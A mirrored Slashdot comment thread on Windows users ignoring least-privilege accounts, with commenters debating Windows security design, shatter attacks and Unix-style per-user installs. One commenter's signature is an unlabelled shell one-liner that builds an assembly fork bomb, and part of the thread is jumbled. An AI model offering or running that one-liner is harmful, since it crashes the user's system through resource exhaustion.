Slashdot Mirror
Windows Users Ignoring LUA Security
blankify writes "eWeek is running a story about the least-privilege, no-admin option available in Windows (2000/XP/2003) that has been mostly ignored by end users. From the article: '"To the average user, the notion of non-admin is abstract and obscure," said Michael Howard, a senior security program manager in Microsoft Corp.'s security business and technology unit. "Most users just don't know they can set up least-privilege accounts in Windows today, and that's just a sad reality."'"
How about, embracing and extending good practice...
Deleted
Could it be "the sad reality" because Windows up until XP (ignoring 2000 and NT) there was no user-priviledges differences?
Maybe MS should start educating the population and force them to create passworded least-priviledged accounts and choose a password for the administrator account when installing or booting an OEM for the first time. Maybe also the administrator should be blocked out of surfing the web and playing games so that people just don't use the admin account for everything.
DOS 3.3 was the first MS OS I understood, so much so that, when the first DOSSHELL came out, I asked why would someone need that? I jumped on the NT technology because, when it first came out, it was well documented, (vis a vis my experience) and it allowed a whole new playing field. When NT 4 came out MS moved Video and Printer drivers from User mode to kernel mode. This was, IIRC, about the time Bill Gates had his vision of the PC integrated multi media household. I believe the PC version of Windows has persued this vision of multimedia OS to the point of having become in WinXP an ugly, bloated kludge, but it does, as much as possible, deliver in an ugly way, as a backward compatible multimedia OS.
Win 2K was the last OS to maintain the promise that Win New Technology brought with it. Win XP saw the culimnation of MS' effort to integrate Win95/98/ME with some of the benefits of NT, but the end result is an all and everything everyman's stew meant to satisfy the cravings of the masses.
I run WinXP on a web box for multimedia but thanks to the lessons gleaned online (/.:) I'm moving on to a *BSD, or one of the upcoming microkernel OSes to do research.
"Academicians are more likely to share each other's toothbrush than each other's nomenclature."
Cohen
most likely because this option breaks most applications
This is why most people don't know about it; developers and vendors barely understand Windows security, so it's ignored. The users instinctively know this and they play along, ignoring the existing capabilities.
The Microsoft platform is closed, poorly designed, obscure and ambiguous. Side effects are common and difficult to prevent or correct. Frobbing things that vendors aren't paying close attention to is a good way to invent new breakage.
Go ahead, be the first on your block to harden Windows with naive LUA. Spend the next two years chasing down truly arcane breakage. Teach Microsoft and third party vendors how to promulgate securable products. Meanwhile, I'll be using software on platforms that figured out most of this stuff a decade ago.
Lurking at the bottom of the gravity well, getting old
Actually the best way is to use Fast User Switching. Have an Admin account and your normal one. Do Adminy stuff in the Admin account and everything else in the normal one. Once you get used to it, it's a couple of keystrokes to flip between the two. Unlike Run As, the two zones are on different desktops, which means that you're invulnerable to Shatter attacks windows running with admin privileges
Here's a good blog with much more info
Some people even prefer this to su.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
I think you're over-simplifying this. The Windows NT kernel and core services were designed with security in mind. The real issue is that the shell, UI, and API's do a really poor job of enforcing and providing convenient access to that model. MS made a tough choice when they created they Win32 API; they kept developer compatability and convenience but made security a whole lot harder. There are too many default behaviors in Windows that are just dangerous.
Look how CreateProcess will progressively search for an executable at each space delimited chunk in an unquoted path; that makes a great trojan attack. Consider the shatter vulnerability and associated dangers that result from simple window input; that's why services have to be run on a seperate ACL'd desktop to be safe. Consider how trivially a power user can escalate to admin; look at how many apps need at least that privelege. Look how much code you have to write to set a simple multi-user DACL on an object.
The fact is that security is very hard to do properly in an MS environment, and historically MS has done a very poor job of promoting and simplifying it. I audit security software now, but when I wrote software I had a ton of homegrown libraries to handle things shouldn't have been necessary. So while I agree the tools are there, you almost have to be a security expert to use them properly.
Yeah? That's because Unix type systems have had multiple users since, well, ever.
/'s, she's only going to take her stuff out, and maybe other people who share her group.
You have to accept the fact that certian people shouldn't do certian things on computers.
The fas is that it should be dead simple for a grandma so able to do so, to install a card game in her home directory, without bothering anyone else on a system--a unix system. It goes there, and, what? There's no issue. Quake 3 has the ability to install into a non-root privlidged user's account. If grandma rm -rf
In Windows land, that card game may well have a fit if it dosen't get installed to c:\program files\bullshit cards. If it dosen't work that way on any system, the program is b0rked. Written by an idjet. It dosen't help that MS has programmed people and software writers to behave this way since, well, ever.
****EVERY**** MS home directory should by default have a My Programs folder, and software installed by that user should end up there--unless it really, really does need administrator access, or it needs to be shared by multiple users. Otherwise, who cares if grandma installs bonsai buddy, it's only going to affect her account and not spread to administrator--where everything can be gleefully cleaned.